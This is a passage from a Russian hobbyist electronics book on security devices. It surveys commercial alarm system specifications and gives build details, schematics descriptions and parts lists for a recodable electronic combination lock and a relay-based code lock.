Рассматривая некоторые конкретные типы сторожевых устройств, предлагаемых к использованию, по приведенным в рекламных проспектах сведениям, можно сделать неправильные выводы и принять неточные решения, так как ни одно из этих изделий не подтверждается схемами электронных устройств и на них нет необходимой КД. Как правило, в рекламных проспектах и паспортах сторожевых устройств кратко указывается их назначение, но подробно расписываются второстепенные преимущества и даются общие сведения по установке и обслуживанию. Например, при установке противоугонной системы типа «Викинг-604» со всех выводных и монтажных проводников снимаются и уничтожаются все маркировочные знаки и обозначения, не указываются технические характеристики ни на основных, ни на вспомогательных блоках и устройствах системы, чем обеспечивается невозможность демонтажа, ремонта и регулировки этого изделия вне мастерской, где оно было смонтировано. Подобный «сервис» делает хозяина автотранспорта полностью зависимым от фирмы, в которую он обратился.
И еще необходимо отметить, что в названной и других противоугонных системах указывается: сторожевое устройство управляется автоматически по программе специальным ключом с встроенной в него микросхемой и должно обеспечивать: блокировку двигателя по трем шлейфам, автоматическое включение, выключение кодовым ключом, динамическое изменение кода в пределах до миллиарда комбинаций, невозможность сканирования, блокировку стартера и топливного насоса, использование сторожевого устройства с любыми типами сигнальных устройств.
Очевидно, что такая информация для специалистов и радиолюбителей не представляет какой-либо интерес даже для предварительной оценки, если нет сведений о составе функциональных узлов и блоков, их монтажных и принципиальных схем.
Некоторые сторожевые устройства промышленного производства, а также выпускаемые отдельными фирмами заслуживают нашего внимания, потому что имеют повышенные технические характеристики и улучшенные электрические параметры, но и они не свободны от указанных выше недостатков.
Например, универсальная тревожная система «Микрон» позволяет осуществлять радиоохрану магазинов, офисов, квартир, гаражей и т. д. на расстоянии до 1,5 км от ЦПУ в зависимости от условий расположения охраняемых объектов.
Основные электрические параметры и технические характеристики универсальной тревожной системы
Номинальная рабочая частота радиоканала, кГц ... 26 960 Чувствительность принимающего устройства, мкВ,
не менее............................ 10
Номинальное напряжение питающей сети
переменного тока, В.................... 220
Таблица 3.1, Время работы автономных источников питания постоянного тока типа PS20
Окончание табл. 3. 1
Номинальное напряжение автономного источника
питания постоянного тока, В............... 12
Номинальнаяя частота питающей сети переменного тока, Гц ..................... 50
Пределы изменения напряжении питающей сети
переменного тока, при которых сохраняется
работоспособнось системы, В .............. 198...240
Пределы изменения напряжения питающей сети
постоянною тока, В..................... 10... 14
Количество номеров абонентов, шт............ 1000
Мощносгь, потребляемая системой в период работы
при полной нагрузке, Вт.................. 500
Пределы изменения выходной мощности
сигнала тревоги, Bт ................... 1,2...2
Задержка подачи сигнала после cpaбатывания
системы, с ........................... 60...100
Количество охраняемых шлейфов, шт .......... .2
Продолжительность работы передатчика
после срабатывания системы, с ............. 10
Номинальный ток при полной нагрузке, А ....... 0,6
Номинальная емкость резервных источников
питания, А-ч .......................... 1,5
Вероятность безотказной работы системы
при риске заказчика в=0, 95, не менее........ 0, 93
Количество кодированных сигналов, шт......... 10 000
кпд, %, не менее........................ 90
Универсальная система сторожевой сигнализации «Роса» предназначена для установки как на стационарных, гак и на подвижных объектах. Эта система характеризуется значительным радиусом действия, мгновенной передачей информации или сигнала тревоги на ЦПУ, возможностью передачи информации на персональный приемник, возможностью охраны нескольких объектов одновременно, наличием резервного электропитания, электронным доступом к охраняемым объектам, возможностью контроля за состоянием охраняемого объекта, возможностью программирования сигналов контроля.
Рассматриваемая система включает в свой состав пульт централизованного наблюдения, абонентские комплекты для автомобилей, стационарных объектов и групповых объектов охраны. В свою очередь, в состав этих изделий входят персональный компьютер, БП, приемное устройство, антенный усилитель, антенна, программное обеспечение, электронные ключи, персональный приемник с зарядным устройством, блок передатчика с антенной, концентратор с системой доступа к электронным блокам.
Основные электрические параметры и технические характеристики электронного сторожевого устройства «Роса»
Диапазон рабочих частот, МГц, в пределах которых
устанавливается одна частота для конкретного
объекта охраны .................. 140...210
Чувствительность приемника у абонента, мкВ,
не более ...................... 0,5
Избирательность, дБ ................ 65. .70
Излучение гетеродина в антенне, нВт, не более .... 2
Мощность несущей частоты излучателя,Вт ...... . 4...6
Девиация частоты, кГц .................... 10,8...15,6
Номинальное напряжение питающей сети
переменного тока, В ................... 220
Номинальная частота питающей сети
переменного тока, Гц .................... 50
Номинальное напряжение автономного источника
питания постоянного тока, В ............... 12
Пределы изменения напряжения питающей сети
переменного тока, В ..................... 187...242
Пределы изменения частоты питающей сети
неременного тока, Гц ................... . 49,5...50,5
Пределы изменения напряжения автономного
источника питания постоянного тока, В ........ 10,8...15
Напряжение питания персонального переносного
приемника, В ........................ . 6,6...8,5
Непрерывное время работы персонального приемника
без подзарядки аккумулятора, ч ............. 12
Время работы резервного источника питания
при нормальной температуре, ч ............. 4
Общее число шлейфов, шт .................. 8
Время передачи тревожной сигнализации, с ...... 10
Время передачи одной радиопосылки, мс ........ 16
Срок службы устройства, ч, не менее .......... 5000
Вероятность безотказной работы системы при риске
заказчика в=0,9, не менее ............... .0,92
Ток, потребляемый устройством в ждущем режиме
работы, А, не более .................... .0,07
Сопротивление изоляции токоведущих частей
отдельных блоков системы относительно
металлического корпуса, МОм, не менее ....... 10
Помехозащищенность системы при воздействии
внешнего электромагнитного поля, дБ ......... 120
кпд, %, не менее ........................ 75
Условия эксплуатации:
температура окружающей среды, С ........ —10...+40
относительная влажность воздуха
при температуре 25 °С, % ............. . 90±3
Климатическое исполнение .................. УХЛ
Сторожевая автономная система «Оса» (изготавливается в Санкт-Петербурге фирмой «Аквасвязь») устанавливается для охраны квартир, офисов, сейфов, различных средств передвижения: автомобилей, яхт и др. Работает сторожевое устройство как в автономном, так и в режиме выдачи сообщений на ЦПУ.
Основные электрические параметры и технические характеристики сторожевой автономной системы «Оса»
Номинальное напряжение питающий сети
переменного тока в стационарном режиме
работы, В ......................... 220
Номинальная частота питающей сети
неременного тока, Гц ................... 50
Номинальное напряжение автономною источника
электропитания постоянного тока, В ......... 12
Пределы изменения напряжения питающей сети
неременного тока, В .................... 187...242
Пределы изменения частоты питающейсети
переменного тока, Гц ................... 49,5...50,5
Пределы изменения напряжения автономного
источника питания постоянного тока, В ....... 10...15
Коэффициент нелинейных искажений питающей сети
переменного тока, %, не более ............. 12
Количество одновременно охраняемых объектов
при работе в автономном режиме, шт ........ 1
Количество охраняемых точек на одном объекте, шт . . 1...5 Сопротивление шлейфа, кОм, при нормальных
климатических условиях работы ............ 0,6...2,4
Время задержки срабатывания сторожевого
устройства, с, не менее .................. 15
Максимальный ток, потребляемый от сети
переменного тока в режиме передачи сигнала. А,
не более ............................ 2
Период подтверждения работоспособности
устройства, мин, не более ................ 1
Источник резервного электропитания устройства —
аккумулятор ......................... бСГ-1,6
Мощность, потребляемая системой от сети в режиме
вызова и передачи сигнала, Вт ............. 100
Ток, потребляемый внешней сиреной, мА ........ 350
Суммарный ток, потребляемый при полной
нагрузке. А, не более ................... 1
Время непрерывного звучания сирены, мин, не менее . 3 Срок службы, ч, не менее .................. 1000
Срок гарантии, мес ...................... 12
Вероятность безотказной работы устройства
при риске заказчика в= 0,9, не менее ........ 0,95
Сопротивление изоляции токоведущих частей
устройства, МОм, не менее ............... 15
кпд, %,не менее ....................... 80
Условия эксплуатации:
температура окружающей среды, °С ........ —10...+40
относительная влажность воздуха
при температуре 25 °С, % ............. 90±3
Электропитание электронных сторожевых устройств осуществляется, как правило, стабилизированном напряжением постоянного тока, которое вырабатывается вторичными БП или ХИТ. При этом к напряжению электропитания предъявляются достаточно жесткие технические требования. В каждом отдельном случае необходимо обеспечить оптимальные параметры выходного и входного напряжений, максимального тока нагрузки, коэффициентов;
стабилизации и пульсации, внутреннего сопротивления и некоторых других характеристик. Точный инженерный расчет таких стабилизаторов достаточно сложен и не всегда может быть квалифицированно выполнен домашним мастером. Поэтому в электронных схемах сторожевых ус тройств всегда предлагаются готовые решения, которых могут быть улучшены методом упрощенного анализа. Это касается в первую очередь выбора стабилизаторов на ОУ с различными выходными характеристиками.
Выходное напряжение, используемое для электропитания сторожевых устройств, укладывается в следующий ряд: 2; 3; 5; 6; 3; 9; 12,6; 15 В постоянного стабилизированного тока, отдельные значения которого могут плавно изменяться в строго определенных пределах. Ток нагрузки условно разделен на три группы с максимальными значениями до 0,025 А; до 0,8 А; до 2 А, при высоких значениях коэффициента стабилизации.
При монтаже простейших СИП применяются в общем случае такие элементы, как РЭ, управляющее устройство, выпрямительное устройство с ДН и фильтры.
Схемы ДН представлены на рис. 3.1.
В данных схемах элементами образцового напряжения служат стабилитроны VD5 и VD6. Для получения необходимых выходных параметров стабилизаторы питаются от двухполупериодного выпрямителя. В качестве емкостных фильтров применяются электролитические конденсаторы С1 и С2 любых типов, которые могут быть включены параллельно друг другу. В стабилизаторах напряжения используются три основные схемы включения РЭ (рис 3.2).
Порядок упрощенного построения СИП предусматривает следующую последовательность:
1. По номинальному току нагрузки, пользуясь схемой. приведенной на рис. 3.2, выбирается РЭ.
2. По заданному выходному напряжению стабилизатора выбирается схема усилительного элемента и схема
Рис. 3. 1. Схема делителя напряжения:
а — с двумя выходными напряжениями разной полярности, б - с одним выходным напряжением постоянного тока.
Рис. 3. 2. Схема включения регулирующего элемента:
а — на одном транзисторе; б — на трех транзисторах с дополнительным питанием; в — на одном составном транзисторе из трех транзисторов.
Рис. 3. 3. Схемы питания операционных усилителей, применяемых в стабилизаторах напряжения.
питания ОУ (рис. 3.3), если этот ОУ применяется в стабилизаторе напряжения.
3. Далее выбирается схема ДН (рис. 3.1) и на оснонании этих данных составляется полная электрическая схема СИП.
4. По данным, приведенным в табл.3.2—3.4, определяются номинальные значения основных параметров ЭРЭ схемы источника питания.
Таблица 3.2. Основные электрические параметры
вторичного источника электропитания, необходимые для выбора
элементов схемы
Таблица 3.3. Основные электрические параметры регулирующего элемента стабилизатора напряжения
Таблица 3. 4. Основные электрические параметры резисторов и конденсаторов, работающих в стабилизаторе напряжения
Примечание: сопротивления резисторов даны в Ом или кОм, которые обозначены буквой «к». Емкости конденсаторов даны в мкф.
На заключительном этапе упрощенного построения СИП выполняется работа по сборке и монтажу этого устройства. Но перед включением схемы в сеть переменного тока и, самое главное, перед подключением микросхемы типа СН необходимо убедиться, что входное напряжение на ней удовлетворяет требованию:
Uвх min<=Uвх<=Uвхmax.
3. 10. БЫСТРОПЕРЕСТРАИВАЕМОЕ СТОРОЖЕВОЕ УСТРОЙСТВО
Это несложное электронное устройство от ранее рассмотренных отличается как кодированием, так и съемно-логическим решением. Цифровой блок построен на ИМС, которые обладают высокой экономичностью, что позволяет питать его и от автономного источника, и от сети переменного тока. Электронное сторожевое устройство широкого применения выполнено по принципу кодирования информации простым переключением контактов, которое осуществляется в любое время по желанию хозяина собственности. Поэтому данное изделие относится к числу электронных устройств автоматического действия с многотысячными вариантами шифрования. Рассматриваемый в составе сторожевой системы БЭ предназначен для установки на входных бронированных дверях жилых, производственных и хозяйственных помещений от вторжения посторонних лиц и злоумышленников, не знакомых с установленным в данный момент шифром.
Простота шифрования устройства и запоминания кода и достаточная ясность работы электронного быстроперестраиваемого сторожевого устройства позволяют использовать его для охраны гаражей, складских помещений и хозяйственных построек на приусадебных и садово-огородных участках. Многочисленные варианты кодирования не позволяют открыть устройство простым перебором (для открывания замка таким способом потребовалось бы несколько месяцев непрерывной работы). Механическая часть замка здесь не рассматривается.
Устойчивая и надежная работа сторожевого устройства обеспечивается от сети переменного тока напряжением 220 В, реже 127 В частотой 50 Гц или от аккумуляторной батареи с номинальным выходным напряжением постоянного тока 12 В. Подключается аккумуляторная батарея к малогабаритным приборным зажимным контактам Х2 и ХЗ, соблюдая полярность.
Принципиальная электрическая схема рассматриваемого сторожевого устройства, собранного на трех ИМС типа К176, приведена на рис. 3. 16. Как следует из схемы, в состав устройства входят устройство подключения к источникам электропитания, сетевой понижающий трансформатор питания Т1, два выпрямительных устройства, емкостный фильтр, стабилизатор напряжения, выполненный на биполярных транзисторах, кодирующее устройство, электронный блок счетно-решающего устройства и ИМ.
Входное устройство включает в свой состав электрический соединитель X1 типа «вилка», смонтированный с электрическим кабелем и обеспечивающий подключение сторожевого устройства к сети переменного тока; плавкие предохранители F1 и F2, защищающие входные цепи устройства от перегрузок и коротких замыканий, которые могут произойти из-за неправильной сборки и ошибок в монтаже схемы, а также из-за неисправных комплектующих ЭРЭ; индикаторную лампочку H1, сигнализирующую о готовности сторожевого устройства к работе; конденсаторы С1 и С2, обеспечивающие защиту от низкочастотных электромагнитных помех, которые проникают в сеть питания; два малогабаритных зажимных контакта Х2 и ХЗ, рассчитанных на подключение одного соединения.
Сетевой понижающий трансформатор питания Т1 самодельной конструкции изготавливается на броневом ленточном магнитопроводе типа ШЛ с одной катушкой, которая устанавливается на центральном стержне. Площадь активного поперечного сечения стали магнитопровода должна быть не менее 6 см2. Моточные данные сетевого трансформатора Т1 приведены в табл. 3.15. Первичная обмотка трансформатора имеет отвод от 1270-го витка для подключения к сети переменного тока напряжением 127 В. На выходе обмоток трансформатора действует переменное напряжение 6,3 В и 13 В. При изготовлении трансформатора необходимо обеспечить повышенную прочность электроизоляции между слоями обмоточного провода и между обмотками различными изоляционными материалами: лакотканью, изоляционны-
Таблица 3. 15. Моточные данные сетевого понижающего
трансформатора питания Т1, примененного
в быстро перестраиваемом сторожевом устройстве
ми лаками, конденсаторной бумагой и др. Намотка провода на катушку — рядовая, однослойная. Сетевой трансформатор обеспечивает расчетные значения выходных и выпрямленных напряжений постоянного тока, гальваническую развязку вторичных цепей сторожевого устройства от сети переменного тока высокого напряжения и необходимую электробезопасность при эксплуатации.
Первый выпрямитель предназначен для создания постоянного напряжения 13 В, обеспечивающего работу электронной части принципиальной схемы сторожевого устройства. Выпрямитель создан на двух выпрямительных диодах VD1, VD2, собранных по двухполупериодной схеме со средним выводом вторичной обмотки трансформатора. Выпрямитель по этой схеме характеризуется повышенной частотой пульсации выпрямленного напряжения, возможностью использования выпрямительных диодов с общим катодом (или анодом), что значительно упрощает их установку на общем радиаторе охлаждения, а также повышенным обратным напряжением на комплекте выпрямительных диодов и более сложной конструкцией сетевого трансформатора. Выпрямитель работа
ет на емкостный фильтр, собранный на конденсаторах СЗ—С5. Оксидныи электролитический конденсатор С5 имеет большую емкость.
С выпрямителя постоянное напряжение поступает на стабилизатор напряжения, собранный по компенсационной схеме и создающий высокий уровень стабилизации напряжения на нагрузке. Стабилизатор напряжения относится к нерегулируемым устройствам и имеет в своем составе устройство сравнения, РЭ, УПТ и устройство защиты от перегрузок и коротких замыканий в электронной схеме сторожевого устройства. В качестве РЭ в стабилизаторе применен транзистор VT4. Опорное напряжение снимается со стабилитрона VD9. Устройство защиты собрано на стабилитроне VD8, транзисторе VT1 и резисторах R3 и R4. Между базой и эмиттером транзистора VT1 действует разность напряжений. Величина этой разницы зависит от протекающего через резистор R4 тока нагрузки. В номинальном режиме работы через резистор R4 протекает ток нагрузки, и на нем падает очень небольшое напряжение, которое подается на базу транзистора VT1, а напряжение на эмиттере этого транзистора стабилизировано стабилитроном VD8, включенным в прямом направлении.
Быстроперестраиваемое сторожевое устройство состоит собственно из электромеханического замка, работающего от ИМ (электромагнита, соленоида, электромагнитного реле и др.), и управляющей электронной схемы, которая обеспечивает автоматическую подачу сигнала на открывание замка. Кодирование памяти электронной схемы осуществляется замыканием контактов девяти переключателей S6—S14 в соответствующие положения. Эти переключатели, как следует из схемы, имеют всего два положения: «выключено» и «включено». Положение «включено» соответствует сигналу «да» или высокому уровню логической единицы, а положение «выключено» — сигналу «нет» или низкому уровню логического нуля.
Работа сторожевого устройства, включающего в себя счетно-решающий электронный узел, основана на использовании принципа подсчета девятиразрядной кодовой комбинации цифр, которая, в свою очередь, представляет собой произвольное чередование логических уравнений «да» и «нет» (логическая единица или логический нуль). Девятиразрядный шифр вырабатывается
ИМС DA3, на выходе которой установлены импульсные диоды VD11-VD19 и однополюсные переключатели S6- S14. Набор шифра осуществляется двумя переключателями S4 и S5, которые имею переключающие группы контактов, не фиксируемых в нажатом положении. Команда на срабатывание ИМ в открывание дверей охраняемого объекта происходит только при правильном наборе шифра.
Собранный в составе БП узел защиты электронной схемы работает следующим образом. При коротком замыкании и перегрузках в выходных цепях, когда ток нагрузки превышает допустимый, падение напряжения на резисторе R4 открывает транзистор VT1, выключает стабилитрон VD9, и ток через регулирующий транзистор VT4 резко ограничивается. В результате этого нагрузка обесточивается и выключается. Защита электронного узла по данной схеме срабатывает при токе, не превышающем 0,5А, и может регулироваться изменением сопротивления резистора R4.
Выпрямленное и стабилизированное напряжение постоянного тока поступает на узел кодирования и дешифрования, собранный на трех ИМС DA1—DA3. При этом ИМС DA3 выполняет функцию счетчика-дешифратора. Декодирующее устройство содержит два двухполюсных переключателя S4 и S5, при помощи которых последовательно осуществляется дешифрование счетного узла. ИМС DA1 представляет собой RS-триггер, который срабатывает от первого замыкания контактов одного из переключателей S4, S5 и не реагирует на последующие ошибочные включения. ИМС DA2 представляет собой устройство, запрещающее дальнейший счет импульсов вводимого кода после первой ошибки в наборе. В том случае, когда набираемый шифр не совпал с установленным в любом разряде счетчика, на выходе второго триггера ИМС DA2 появляется высокий уровень логической единицы, который запрещает дальнейший счет. Но внешне это никак не проявляется. Последующие нажатия на любые кнопки переключателей S4 и S5 уже не изменяют состояние счетчика до тех пор, пока сторожевое устройство не будет возвращено в исходное положение. И каждое последующее нажатие на кнопки постоянно увеличивает время нахождения ИМС DA3 в состоянии, предшествующем ошибке в наборе шифра. После прекращения нажатий на кнопки
переключателей S4 или S5 по истечении временной задержки на выходе инвертора ИМС DA1 появляется высокий уровень логической единицы, переключающий триггер ИМС DA2 и счетчик ИМС DA3 в состояние низкого уровня логического нуля.
Необходимо также заметить, что в сторожевом устройстве предусмотрен узел задержки времени срабатывания, состоящий из электрической цепочки DA1, VD20, С5, R19, R20. При ошибке в наборе шифра это устройство позволяет повторить попытку только после определенно заданного интервала времени. Если начать повторный набор шифра до истечения времени этого интервала, то срабатывания сторожевого устройства и открывания механического замка не последует даже при правильном наборе. Это важное свойство сторожевого устройства может знать только хозяин.
В схему сторожевого устройства включен оптрон DU1, обеспечивающий передачу сигнала на срабатывание ИМ, полную гальваническую развязку между источником питания ИМ и электронной частью сторожевого устройства, а также дополнительную электробезопасность эксплуатации изделия в целом.
Работу сторожевого устройства контролируют с помощью индикаторной лампы H1 и светодиода VD10. При включении устройства в сеть переменного тока загорается индикаторная лампа H1, а при срабатывании механической части замка после правильного набора шифра — светодиод VD10 красного или зеленого цвета.
На принципиальной электрической схеме сторожевого устройства показано положение электронной схемы при всех отключенных контактах переключателей S6—S14, которое соответствует низкому уровню логического нуля, то есть набора нет. При правильном наборе шифра сигнал высокого уровня логической единицы с выхода ИМС DA3 (вывод 11) открывает ключевой транзистор VT2, что приводит к срабатыванию оптрона DU1, а вслед за ним — тиристора VD7, включающего электропитание исполнительного электромагнита или соленоида, и механический замок открывается.
Если за период временной задержки дверь охраняемого объекта не будет открыта, сторожевое устройство возвращается в исходное состояние, соответствующее нулевому состоянию второго триггера ИМС DA2 и счетчика-дешифратора ИМС DA3.
В быстропереcтраиваемом сторожевом устройстве применены следующие покупные и самодельные комплектующие ЭРИ и ЭРЭ: сетевой понижающий трансформатор питания Т1 типа ШЛ броневой конструкции; ИМС DA1 типа К176ЛА7, DA2 — К176ТМ2, DA3 К176ИЕ8; транзисторы VT1 типа МП42, VT2 — КТ315Г, VT3 — МП42, VT4 — П213; выпрямительные диоды VD1 типа Д226Д, VD2 Д226Д, VD3 VD6 - КД202Р, VD11-VD19 — КД522А, VD20 — КД522А, VD21 - КД105Б;
стабилитроны VD8 типа Д814Д, VD9 — Д814Д; тиристор VD7 типа КУ202Н; светодиод VD10 типа АЛ307А; оптрон DU1 типа АОУ103Б; ИМ К1 (электромагнит, соленоид или электромагнитное реле); индикаторная лампа Н1 типа МН-6,3-0,22 А; плавкие предохранители F1, F2 типа ПМ1-0.5 A, F3 — ПMl-0,25 A;
переключатели S1 типа П2Т-1-1, S2, S3 — П1Т-1-1, S4, S5 — МПЗ-1, S6—S14 — МТ1-2; конденсаторы С1 типа К40У-9-630В-0,033 мкФ, С2 — К40У-9-630В-0,033 мкФ, С5 — К50-6-25В-500 мкФ, С4 — К10-7В-50В-2200 пф, СЗ — К10-7В-50В-2200 пФ, С6 — К50-6-25В-500 мкФ, С7 — ЭТО-20В-1.5 мкФ; резисторы R1 типа ВСа-0,5-2,2 кОм, R2 — ВСа-1-2,4 кОм, R3 — ВСа-1-620 Ом, R4 — проволочный самодельный, намотан на резисторе ВСа-2-2 Ом нихромовым проводом диаметром 0,1 мм, R5 — ВСа-0,5-750 Ом, R6 — ВСа-0,25-470 Ом, R7 — СПЗ-1б-0,5Вт-2,2 к0м, R8 — ВСа-0,5-1,2 кОм, R9 — ВСа-0,25-10 кОм, R10 — ВСа-0,25-470 Ом, R11 — ВСа-0,5-4,3 к0м, R12 — ВСа-0,25-2,4 к0м, R13 — ВСа-2-10 к0м, R14 — ВСа-0,25-1 к0м, R15 — ВСа-0,125-100 к0м, R16 — ВСа-0,25-82 к0м, R17 — ВСа-0,125-27 к0м, R18 — ВСа-0,5-27 к0м, R19 — ВСа-0,125-27 к0м, R20 — ВСа-0,125-4,7 к0м, электрические соединители X1 типа «вилка» с электрическим кабелем длиной не менее 1,5 м, Х2, ХЗ — КМЗ-1.
При регулировке и ремонте электронной части сторожевого устройства некоторые ЭРИ и ЭРЭ могут быть заменены другими аналогичными элементами, не ухудшающими основные электрические параметры и эксплуатационные характеристики сторожевого устройства. Например, сетевой понижающий трансформатор питания Т1 можно заменить на унифицированный трансформатор типа ТПП, ТН, ТС или ТТ; конденсаторы типа К50-6 — на К50-3, К50-12, К50-16, К50-20; резисторы типа ВСа — на МЛТ, ОМЛТ, ВС, МТ, УЛИ, C1-4, C2-8; диоды типа Д226Д — на Д237А, Д237Е, КД202В, диоды типа Д202Р — на Д234Б, Д248Б, КД206В, диоды типа КД522А — на КД509А, КД510А, КД513А. Рекомендации по замене транзисторов рассмотрены выше, в первой главе.
Необходимо заметить, что выбор нового шифра осуществляется переключением контактов выключателей
S6—S14 в течение нескольких секунд, поэтому данное устройство относится к числу быстроперестраиваемых.
Изготавливается сторожевое устройство в виде двух самостоятельных блоков: БП и БЭ. Блок питания имеет максимальные размеры 130Х110Х80 мм, выполнен в виде прямоугольника с лицевой панелью, верхней и нижней крышками, в которых предусматриваются вентиляционные отверстия, расположенные в местах установки тепловыделяющих элементов. На лицевой панели БП устанавливаются индикаторная лампочка Н1,держатели предохранителей F1 и F2, клеммы Х2 и ХЗ, на которых действует постоянное стабилизированное напряжение 9 В, и ручки управления переключателями S2 и S3.
Блок электроники изготавливается в пластмассовом корпусе с размерами 140Х35Х50 мм. На верхней крышке корпуса располагаются: индикаторная лампочка (светодиод), ручки управления переключателей S6—S14, приборные малогабаритные зажимные контакты А и Б, контакты для подключения электропитания ИМ Х4 и Х5 к сети переменного тока и контакты Х6 и Х7 для подключения исполнительного устройства, которое устанавливается непосредственно на входной двери охраняемого объекта. Все комплектующие элементы БЭ монтируются на печатной плате из одностороннего фольгированного стеклотекстолита толщиной 1...1,5 мм.
При изготовлении лицевых панелей БП и БЭ сторожевого устройства необходимо вырезать много прямоугольных и круглых отверстий разного размера, которые выполняются по предварительной разметке, сделанной на миллиметровой бумаге и заранее наклеенной на лицевую панель.
Необходимо еще раз обратить внимание на правильность установки и пайки микросхем серии К176. При этом меры предосторожности не сводятся только к тому, чтобы защитить корпус микросхемы от недопустимых деформаций. Конструкция должна обеспечивать эффективный отвод тепла за счет конвекции воздуха или с помощью теплоотводящих элементов. Должно быть обеспечено высокое качество паяных соединений. И не менее важным обстоятельством при работе с микросхемами этой серии является необходимость соблюдения специальных мер защиты от повреждений статическим электричеством. Жало паяльника заземляется, на руку надевается заземляющий браслет в виде манжеты, а электропитание паяльника должно осуществляться только через понижающий сетевой трансформатор, обеспечивающий полную гальваническую развязку.Часто в распоряжении радиолюбителя имеются микросхемы, подходящие по функциональному назначению, но нет технической возможности для такой замены. В этом случае можно изготовить плату-переходник из фольгированного стеклотекстолита. Новую схему монтируют на этой плате, которую соединяют с печатной платой. При хранении ИМС, некоторых типов транзисторов (особенно полевого типа) выводы таких ЭРЭ закорачивают между собой, как правило, медным проводником или алюминиевой фольгой.
Примененные в устройстве микросхемы относятся к структурам КМОП, и поэтому вышеприведенная рекомендация для снятия статического электричества является особенно важной. При создании устройств с микросхемами, примененными в сторожевом устройстве, типы конденсаторов и значения их емкостей выбираются из расчета: емкость электролитического конденсатора на одну микросхему должна быть не менее 0,03 мкФ.
Создание электронных сторожевых устройств на ИМС со структурой КМОП сопряжено с необходимостью учитывать технологию их изготовления. Известно, что эти микросхемы подвержены губительному влиянию статического электричества. Опасное значение электрического потенциала составляет примерно +100 В постоянного тока. Пайку выводов этих микросхем следует начинать с выводов питания, но затем последовательность пайки может быть любой.
Дополнительно следует заметить, что микросхемы по технологическим приемам изготовления подразделяются на определенные типы, основными из которых являются микросхемы ТТЛ — транзисторно-транзисторной логики;
ТТЛШ — ТТЛ с диодами Шоттки; КМОП — микросхемы комплементарной структуры типа металл — окисел — полупроводник.
Основные электрические параметры и технические характеристики быстроперестраиваемого сторожевого устройства
Номинальное напряжение питающей сети
переменного тока, В .................. .220 или 127
Номинальная частота питающей сети
переменного тока, Гц ................ .50
Номинальное напряжение автономного источника
электропитания постоянного тока, В ........9
Коэффициент нелинейных искажении питающей сети
переменною тока, %, не более ............. 12
Пределы изменения напряжения питающей сети
переменного тока, В .................... 180.... .250 или 110... .140
Пределы изменения частоты питающей сети
переменного тока, Гц .................... 49,5... 50,5
Пределы изменения напряжения автономного
источника электропитания сторожевого устройства
постоянного тока, В ..................... 8.... 14
Напряжение на вторичной обмотке сетевого
трансформатора Т1 при номинальном напряжении
питающей сети 220 В, В .................. 26 (выводы 4 и 6)
Напряжения на выводах вторичных обмоток
трансформатора Т1 при изменении напряжения
питающей сети oт 180 до 250В, В:
4 и 5 ............................. 10,6...14,7
5 и 6 . ............................ 10,6...14,7
7 и 8 . ............................ 5,1... 7,1
Коэффициент стабилизации выпрямленного напряжения, не менее ................... 500
Амплитуда пульсации выпрямленного напряжения постоянного тока на выходе выпрямителя, мВ, не более ............................ 10
Номинальный ток питания ИМ замка. А, не более . . 0,5 Ток срабатывания защитного устройства в БП при коротком замыкании, А .......... 0,3
Мощность, потребляемая сторожевым устройством в ждущем режиме работы, мВт, не более . . . . . . 20
Время срабатывания сторожевого устройства
после правильного набора шифра, мс, не более . . 40
Мощность сетевого трансформатора, Вт . . . . . . . . 60
Время задержки в наборе шифра при ошибке, с . . . 3-20
Вероятность безотказной работы устройства
при риске заказчика в=0,9, не менее ......... 0,89
Срок службы устройства, ч, не менее .......... 7000
Помехозащищенность сторожевого устройства от ложных срабатываний при воздействии внешнего электромагнитного поля в полисе частот от 0,15 до 30 МГц, не менее . . . . . . . . . . . . . . . 60
Сопротивление изоляции токоведущих частей и проводников устройства между собой и металлическим корпусом, МОм, не менее . . . . . 5
кпд, %, не менее . . . . . . . . . . . . . . . . . . . . . . . . 85
Условия эксплуатации:
температура окружающей среды, °С . . . . . . . . —25...+-45
относительная влажность воздуха
при температуре окружающей среды 22 С, %, не более ......................... 90+-3
атмосферное давление воздуха, мм рт. ст...... 200... 900
Рис. 3.16. Принципиальная схема быстроперестраиваемого сторожевого устройства.
3.11. СТОРОЖЕВОЕ УСТРОЙСТВО НА ЭЛЕКТРОМАГНИТНЫХ PEЛE
Рассматриваемое устройство относится к группе релейных автоматов, предназначенных для управления электромеханическими замками, которые устанавливаются на дверях жилых и производственных здании. Особенностью данного устройства является то, что оно очень просто в изготовлении, не нуждается в сложной и длительной настройке, не имеет в своем составе ППП и элементов электроники, работает непосредственно от сети переменного тока напряжением 220 В частотой 50 Гц. Последнее обстоятельство предъявляет особые условия к монтажу и электропроводке сторожевого устройства, главными из которых являются требования по технике электробезопасности и пожаробезопасности.
Схемно-конструктивное решение этого устройства позволяет устанавливать его только в тех помещениях и на объектах, где имеется возможность подключения к сети переменного тока, поэтому область применения устройства несколько ограничена, а его релейный блок требует постоянного осмотра и наблюдения за его состоянием. Не менее важной особенностью релейного автомата является то, что он позволяет очень быстро устанавливать любой код, без каких-либо перепаек и монтажа перемычек, так как не содержит разъемных соединений и приборных контактов. Весь монтаж осуществляется электрическим кабелем с двойной изоляцией, сопротивление постоянному току которого должно быть не менее 50 МОм. Монтажные соединения между контактами релейного блока должны производиться только многожильным проводом пайкой, например припоем ПОС-60.
Принципиальная электрическая схема сторожевого устройства на электромагнитных реле без применения ППП приведена на рис. 3.17. Устройство состоит из релейного блока, включающего семь электромагнитных реле типа МКУ-48, кодирующего узла и дешифратора.
Основным блоком устройства является блок электромагнитных реле, который изготавливается в металлическом или пластмассовом корпусе. На верхней крышке этого блока собирается узел кодирования, выполненный из семи перекидных переключателей с фиксированным положением контактных пар. Релейный блок и узел кодирования представляют собой единую сборочную конструкцию, которая устанавливается на стене охраняемого помещения и вдали от входной двери, так как соединяется с сетью питания и блоком управления двумя двужильными проводами. На боковых поверхностях релейного блока необходимо предусмотреть вентиляционные отверстия, не снижающие механической прочности конструкции.
В качестве кодирующих переключателей S3—S9 рекомендуется использовать двухполюсные переключатели типа МТ1, П1Т-1-1.
Дешифратор изготавливается в виде прямоугольной пластмассовой конструкции, в которой монтируются кнопочные переключатели S2, S10—S16. Устанавливается дешифратор на входной двери и соединяется с релейным блоком и сетью электропитания монтажным проводом и электрическим многожильным кабелем. В качестве кнопочных переключателей используются малогабаритные кнопки КМ, предназначенные для коммутации электрических цепей с активной нагрузкой постоянного тока от 0, 0005 до 3 А и напряжением от 0, 5 до 250 В и имеющие износостойкость не менее 10 000 циклов переключении типа КМ1-1.
